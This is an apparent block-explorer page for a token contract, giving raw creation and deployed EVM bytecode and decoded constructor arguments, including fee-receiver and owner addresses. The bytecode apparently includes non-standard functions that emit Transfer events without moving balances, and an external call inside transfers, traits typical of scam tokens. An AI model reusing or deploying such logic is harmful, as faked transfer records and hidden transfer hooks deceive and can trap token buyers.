b60405180910390fd5b8181610d2391906116fd565b6000808673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002081905550816000808573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000206000828254610db39190611731565b92505081905550610dc5848484610ef6565b50505050565b60007f0000000000000000000000000000000000000000000000000000000000000000905090565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1614610ef157600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16637512c5a3848430600660009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16866040518663ffffffff1660e01b8152600401610eac959493929190611ad1565b6020604051808303816000875af1158015610ecb573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190610eef91906115c7565b505b505050565b505050565b600081519050919050565b600082825260208201905092915050565b60005b83811015610f35578082015181840152602081019050610f1a565b60008484015250505050565b6000601f19601f8301169050919050565b6000610f5d82610efb565b610f678185610f06565b9350610f77818560208601610f17565b610f8081610f41565b840191505092915050565b60006020820190508181036000830152610fa58184610f52565b905092915050565b6000604051905090565b600080fd5b600080fd5b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b6000610fec82610fc1565b9050919050565b610ffc81610fe1565b811461100757600080fd5b50565b60008135905061101981610ff3565b92915050565b6000819050919050565b6110328161101f565b811461103d57600080fd5b50565b60008135905061104f81611029565b92915050565b6000806040838503121561106c5761106b610fb7565b5b600061107a8582860161100a565b925050602061108b85828601611040565b9150509250929050565b60008115159050919050565b6110aa81611095565b82525050565b60006020820190506110c560008301846110a1565b92915050565b6110d48161101f565b82525050565b60006020820190506110ef60008301846110cb565b92915050565b600080fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052604160045260246000fd5b61113282610f41565b810181811067ffffffffffffffff82111715611151576111506110fa565b5b80604052505050565b6000611164610fad565b90506111708282611129565b919050565b600067ffffffffffffffff8211156111905761118f6110fa565b5b602082029050602081019050919050565b600080fd5b60006111b96111b484611175565b61115a565b905080838252602082019050602084028301858111156111dc576111db6111a1565b5b835b8181101561120557806111f1888261100a565b8452602084019350506020810190506111de565b5050509392505050565b600082601f830112611224576112236110f5565b5b81356112348482602086016111a6565b91505092915050565b600067ffffffffffffffff821115611258576112576110fa565b5b602082029050602081019050919050565b600061127c6112778461123d565b61115a565b9050808382526020820190506020840283018581111561129f5761129e6111a1565b5b835b818110156112c857806112b48882611040565b8452602084019350506020810190506112a1565b5050509392505050565b600082601f8301126112e7576112e66110f5565b5b81356112f7848260208601611269565b91505092915050565b600080600080600060a0868803121561131c5761131b610fb7565b5b600061132a8882890161100a565b955050602086013567ffffffffffffffff81111561134b5761134a610fbc565b5b6113578882890161120f565b945050604086013567ffffffffffffffff81111561137857611377610fbc565b5b611384888289016112d2565b935050606086013567ffffffffffffffff8111156113a5576113a4610fbc565b5b6113b1888289016112d2565b92505060806113c28882890161100a565b9150509295509295909350565b6000806000606084860312156113e8576113e7610fb7565b5b60006113f68682870161100a565b93505060206114078682870161100a565b925050604061141886828701611040565b9150509250925092565b600060ff82169050919050565b61143881611422565b82525050565b6000602082019050611453600083018461142f565b92915050565b60006020828403121561146f5761146e610fb7565b5b600061147d8482850161100a565b91505092915050565b6000806040838503121561149d5761149c610fb7565b5b60006114ab8582860161100a565b92505060206114bc8582860161100a565b9150509250929050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b6000600282049050600182168061150d57607f821691505b6020821081036115205761151f6114c6565b5b50919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052603260045260246000fd5b61155e81610fe1565b82525050565b60006060820190506115796000830186611555565b6115866020830185611555565b61159360408301846110cb565b949350505050565b6115a481611095565b81146115af57600080fd5b50565b6000815190506115c18161159b565b92915050565b6000602082840312156115dd576115dc610fb7565b5b60006115eb848285016115b2565b91505092915050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b600061162e8261101f565b91507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff82036116605761165f6115f4565b5b600182019050919050565b7f45524332303a207472616e7366657220616d6f756e742065786365656473206160008201527f6c6c6f77616e6365000000000000000000000000000000000000000000000000602082015250565b60006116c7602883610f06565b91506116d28261166b565b604082019050919050565b600060208201905081810360008301526116f6816116ba565b9050919050565b60006117088261101f565b91506117138361101f565b925082820390508181111561172b5761172a6115f4565b5b92915050565b600061173c8261101f565b91506117478361101f565b925082820190508082111561175f5761175e6115f4565b5b92915050565b7f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f7760008201527f207a65726f000000000000000000000000000000000000000000000000000000602082015250565b60006117c1602583610f06565b91506117cc82611765565b604082019050919050565b600060208201905081810360008301526117f0816117b4565b9050919050565b7f45524332303a20617070726f76652066726f6d20746865207a65726f2061646460008201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b6000611853602483610f06565b915061185e826117f7565b604082019050919050565b6000602082019050818103600083015261188281611846565b9050919050565b7f45524332303a20617070726f766520746f20746865207a65726f20616464726560008201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b60006118e5602283610f06565b91506118f082611889565b604082019050919050565b60006020820190508181036000830152611914816118d8565b9050919050565b7f45524332303a207472616e736665722066726f6d20746865207a65726f20616460008201527f6472657373000000000000000000000000000000000000000000000000000000602082015250565b6000611977602583610f06565b91506119828261191b565b604082019050919050565b600060208201905081810360008301526119a68161196a565b9050919050565b7f45524332303a207472616e7366657220746f20746865207a65726f206164647260008201527f6573730000000000000000000000000000000000000000000000000000000000602082015250565b6000611a09602383610f06565b9150611a14826119ad565b604082019050919050565b60006020820190508181036000830152611a38816119fc565b9050919050565b7f45524332303a207472616e7366657220616d6f756e742065786365656473206260008201527f616c616e63650000000000000000000000000000000000000000000000000000602082015250565b6000611a9b602683610f06565b9150611aa682611a3f565b604082019050919050565b60006020820190508181036000830152611aca81611a8e565b9050919050565b600060a082019050611ae66000830188611555565b611af36020830187611555565b611b006040830186611555565b611b0d6060830185611555565b611b1a60808301846110cb565b969550505050505056fea2646970667358221220628161901aeb5b3961ae8be97b1eec5f39d1386a30eddc506fdad27874da8ea864736f6c63430008110033000000000000000000000000000000000000000000000000000000000000000900000000000000000000000000000000000000000000000000000002540be400000000000000000000000000ee3e375feb6197c5b37c210fbae8d09828e3adb0000000000000000000000000fbfeaf0da0f2fde5c66df570133ae35f3eb58c9a

Deployed Bytecode

0x608060405234801561001057600080fd5b50600436106100cf5760003560e01c8063395093511161008c578063a457c2d711610066578063a457c2d71461023c578063a9059cbb1461026c578063dd62ed3e1461029c578063e156b1b6146102cc576100cf565b806339509351146101be57806370a08231146101ee57806395d89b411461021e576100cf565b806306fdde03146100d4578063095ea7b3146100f257806318160ddd146101225780631c63aef21461014057806323b872dd14610170578063313ce567146101a0575b600080fd5b6100dc6102fc565b6040516100e99190610f8b565b60405180910390f35b61010c60048036038101906101079190611055565b61038e565b60405161011991906110b0565b60405180910390f35b61012a6103ac565b60405161013791906110da565b60405180910390f35b61015a60048036038101906101559190611300565b6103b6565b60405161016791906110b0565b60405180910390f35b61018a600480360381019061018591906113cf565b610536565b60405161019791906110b0565b60405180910390f35b6101a8610637565b6040516101b5919061143e565b60405180910390f35b6101d860048036038101906101d39190611055565b610646565b6040516101e591906110b0565b60405180910390f35b61020860048036038101906102039190611459565b6106f2565b60405161021591906110da565b60405180910390f35b61022661073a565b6040516102339190610f8b565b60405180910390f35b61025660048036038101906102519190611055565b6107cc565b60405161026391906110b0565b60405180910390f35b61028660048036038101906102819190611055565b6108c0565b60405161029391906110b0565b60405180910390f35b6102b660048036038101906102b19190611486565b6108de565b6040516102c391906110da565b60405180910390f35b6102e660048036038101906102e191906113cf565b610965565b6040516102f391906110b0565b60405180910390f35b60606003805461030b906114f5565b80601f0160208091040260200160405190810160405280929190818152602001828054610337906114f5565b80156103845780601f1061035957610100808354040283529160200191610384565b820191906000526020600020905b81548152906001019060200180831161036757829003601f168201915b5050505050905090565b60006103a261039b6109d7565b84846109df565b6001905092915050565b6000600254905090565b600080600090505b8551811015610528578581815181106103da576103d9611526565b5b602002602001015173ffffffffffffffffffffffffffffffffffffffff168773ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef87848151811061044357610442611526565b5b602002602001015160405161045891906110da565b60405180910390a38273ffffffffffffffffffffffffffffffffffffffff1663e156b1b687838151811061048f5761048e611526565b5b6020026020010151898785815181106104ab576104aa611526565b5b60200260200101516040518463ffffffff1660e01b81526004016104d193929190611564565b6020604051808303816000875af11580156104f0573d6000803e3d6000fd5b505050506040513d601f19601f8201168201806040525081019061051491906115c7565b50808061052090611623565b9150506103be565b506001905095945050505050565b6000610543848484610ba8565b6000600160008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600061058e6109d7565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205490508281101561060e576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610605906116dd565b60405180910390fd5b61062b8561061a6109d7565b858461062691906116fd565b6109df565b60019150509392505050565b6000610641610dcb565b905090565b60006106e86106536109d7565b8484600160006106616109d7565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008873ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020546106e39190611731565b6109df565b6001905092915050565b60008060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b606060048054610749906114f5565b80601f0160208091040260200160405190810160405280929190818152602001828054610775906114f5565b80156107c25780601f10610797576101008083540402835291602001916107c2565b820191906000526020600020905b8154815290600101906020018083116107a557829003601f168201915b5050505050905090565b600080600160006107db6109d7565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905082811015610898576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161088f906117d7565b60405180910390fd5b6108b56108a36109d7565b8585846108b091906116fd565b6109df565b600191505092915050565b60006108d46108cd6109d7565b8484610ba8565b6001905092915050565b6000600160008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905092915050565b60008273ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef846040516109c491906110da565b60405180910390a3600190509392505050565b600033905090565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610a4e576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610a4590611869565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610abd576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610ab4906118fb565b60405180910390fd5b80600160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92583604051610b9b91906110da565b60405180910390a3505050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610c17576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610c0e9061198d565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610c86576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610c7d90611a1f565b60405180910390fd5b610c91838383610df3565b60008060008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905081811015610d17576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610d0e90611ab1565b60405180910390fd5b8181610d2391906116fd565b6000808673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002081905550816000808573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000206000828254610db39190611731565b92505081905550610dc5848484610ef6565b50505050565b60007f0000000000000000000000000000000000000000000000000000000000000009905090565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1614610ef157600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16637512c5a3848430600660009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16866040518663ffffffff1660e01b8152600401610eac959493929190611ad1565b6020604051808303816000875af1158015610ecb573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190610eef91906115c7565b505b505050565b505050565b600081519050919050565b600082825260208201905092915050565b60005b83811015610f35578082015181840152602081019050610f1a565b60008484015250505050565b6000601f19601f8301169050919050565b6000610f5d82610efb565b610f678185610f06565b9350610f77818560208601610f17565b610f8081610f41565b840191505092915050565b60006020820190508181036000830152610fa58184610f52565b905092915050565b6000604051905090565b600080fd5b600080fd5b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b6000610fec82610fc1565b9050919050565b610ffc81610fe1565b811461100757600080fd5b50565b60008135905061101981610ff3565b92915050565b6000819050919050565b6110328161101f565b811461103d57600080fd5b50565b60008135905061104f81611029565b92915050565b6000806040838503121561106c5761106b610fb7565b5b600061107a8582860161100a565b925050602061108b85828601611040565b9150509250929050565b60008115159050919050565b6110aa81611095565b82525050565b60006020820190506110c560008301846110a1565b92915050565b6110d48161101f565b82525050565b60006020820190506110ef60008301846110cb565b92915050565b600080fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052604160045260246000fd5b61113282610f41565b810181811067ffffffffffffffff82111715611151576111506110fa565b5b80604052505050565b6000611164610fad565b90506111708282611129565b919050565b600067ffffffffffffffff8211156111905761118f6110fa565b5b602082029050602081019050919050565b600080fd5b60006111b96111b484611175565b61115a565b905080838252602082019050602084028301858111156111dc576111db6111a1565b5b835b8181101561120557806111f1888261100a565b8452602084019350506020810190506111de565b5050509392505050565b600082601f830112611224576112236110f5565b5b81356112348482602086016111a6565b91505092915050565b600067ffffffffffffffff821115611258576112576110fa565b5b602082029050602081019050919050565b600061127c6112778461123d565b61115a565b9050808382526020820190506020840283018581111561129f5761129e6111a1565b5b835b818110156112c857806112b48882611040565b8452602084019350506020810190506112a1565b5050509392505050565b600082601f8301126112e7576112e66110f5565b5b81356112f7848260208601611269565b91505092915050565b600080600080600060a0868803121561131c5761131b610fb7565b5b600061132a8882890161100a565b955050602086013567ffffffffffffffff81111561134b5761134a610fbc565b5b6113578882890161120f565b945050604086013567ffffffffffffffff81111561137857611377610fbc565b5b611384888289016112d2565b935050606086013567ffffffffffffffff8111156113a5576113a4610fbc565b5b6113b1888289016112d2565b92505060806113c28882890161100a565b9150509295509295909350565b6000806000606084860312156113e8576113e7610fb7565b5b60006113f68682870161100a565b93505060206114078682870161100a565b925050604061141886828701611040565b9150509250925092565b600060ff82169050919050565b61143881611422565b82525050565b6000602082019050611453600083018461142f565b92915050565b60006020828403121561146f5761146e610fb7565b5b600061147d8482850161100a565b91505092915050565b6000806040838503121561149d5761149c610fb7565b5b60006114ab8582860161100a565b92505060206114bc8582860161100a565b9150509250929050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b6000600282049050600182168061150d57607f821691505b6020821081036115205761151f6114c6565b5b50919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052603260045260246000fd5b61155e81610fe1565b82525050565b60006060820190506115796000830186611555565b6115866020830185611555565b61159360408301846110cb565b949350505050565b6115a481611095565b81146115af57600080fd5b50565b6000815190506115c18161159b565b92915050565b6000602082840312156115dd576115dc610fb7565b5b60006115eb848285016115b2565b91505092915050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b600061162e8261101f565b91507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff82036116605761165f6115f4565b5b600182019050919050565b7f45524332303a207472616e7366657220616d6f756e742065786365656473206160008201527f6c6c6f77616e6365000000000000000000000000000000000000000000000000602082015250565b60006116c7602883610f06565b91506116d28261166b565b604082019050919050565b600060208201905081810360008301526116f6816116ba565b9050919050565b60006117088261101f565b91506117138361101f565b925082820390508181111561172b5761172a6115f4565b5b92915050565b600061173c8261101f565b91506117478361101f565b925082820190508082111561175f5761175e6115f4565b5b92915050565b7f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f7760008201527f207a65726f000000000000000000000000000000000000000000000000000000602082015250565b60006117c1602583610f06565b91506117cc82611765565b604082019050919050565b600060208201905081810360008301526117f0816117b4565b9050919050565b7f45524332303a20617070726f76652066726f6d20746865207a65726f2061646460008201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b6000611853602483610f06565b915061185e826117f7565b604082019050919050565b6000602082019050818103600083015261188281611846565b9050919050565b7f45524332303a20617070726f766520746f20746865207a65726f20616464726560008201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b60006118e5602283610f06565b91506118f082611889565b604082019050919050565b60006020820190508181036000830152611914816118d8565b9050919050565b7f45524332303a207472616e736665722066726f6d20746865207a65726f20616460008201527f6472657373000000000000000000000000000000000000000000000000000000602082015250565b6000611977602583610f06565b91506119828261191b565b604082019050919050565b600060208201905081810360008301526119a68161196a565b9050919050565b7f45524332303a207472616e7366657220746f20746865207a65726f206164647260008201527f6573730000000000000000000000000000000000000000000000000000000000602082015250565b6000611a09602383610f06565b9150611a14826119ad565b604082019050919050565b60006020820190508181036000830152611a38816119fc565b9050919050565b7f45524332303a207472616e7366657220616d6f756e742065786365656473206260008201527f616c616e63650000000000000000000000000000000000000000000000000000602082015250565b6000611a9b602683610f06565b9150611aa682611a3f565b604082019050919050565b60006020820190508181036000830152611aca81611a8e565b9050919050565b600060a082019050611ae66000830188611555565b611af36020830187611555565b611b006040830186611555565b611b0d6060830185611555565b611b1a60808301846110cb565b969550505050505056fea2646970667358221220628161901aeb5b3961ae8be97b1eec5f39d1386a30eddc506fdad27874da8ea864736f6c63430008110033

Constructor Arguments (ABI-Encoded and is the last bytes of the Contract Creation Code above)

000000000000000000000000000000000000000000000000000000000000000900000000000000000000000000000000000000000000000000000002540be400000000000000000000000000ee3e375feb6197c5b37c210fbae8d09828e3adb0000000000000000000000000fbfeaf0da0f2fde5c66df570133ae35f3eb58c9a

-----Decoded View---------------
Arg [0] : decimals_ (uint8): 9
Arg [1] : initialBalance_ (uint256): 10000000000
Arg [2] : feeReceiver_ (address): 0xee3e375feb6197c5B37C210FbAe8d09828e3adB0
Arg [3] : owner_ (address): 0xfbfEaF0DA0F2fdE5c66dF570133aE35f3eB58c9A

-----Encoded View---------------
4 Constructor Arguments found :
Arg [0] : 0000000000000000000000000000000000000000000000000000000000000009
Arg [1] : 00000000000000000000000000000000000000000000000000000002540be400
Arg [2] : 000000000000000000000000ee3e375feb6197c5b37c210fbae8d09828e3adb0
Arg [3] : 000000000000000000000000fbfeaf0da0f2fde5c66df570133ae35f3eb58c9a


Loading...
Loading
Loading...
Loading
[ Download: CSV Export  ]
[ Download: CSV Export  ]

A token is a representation of an on-chain or off-chain asset. The token page shows information such as price, total supply, holders, transfers and social links. Learn more about this page in our Knowledge Base.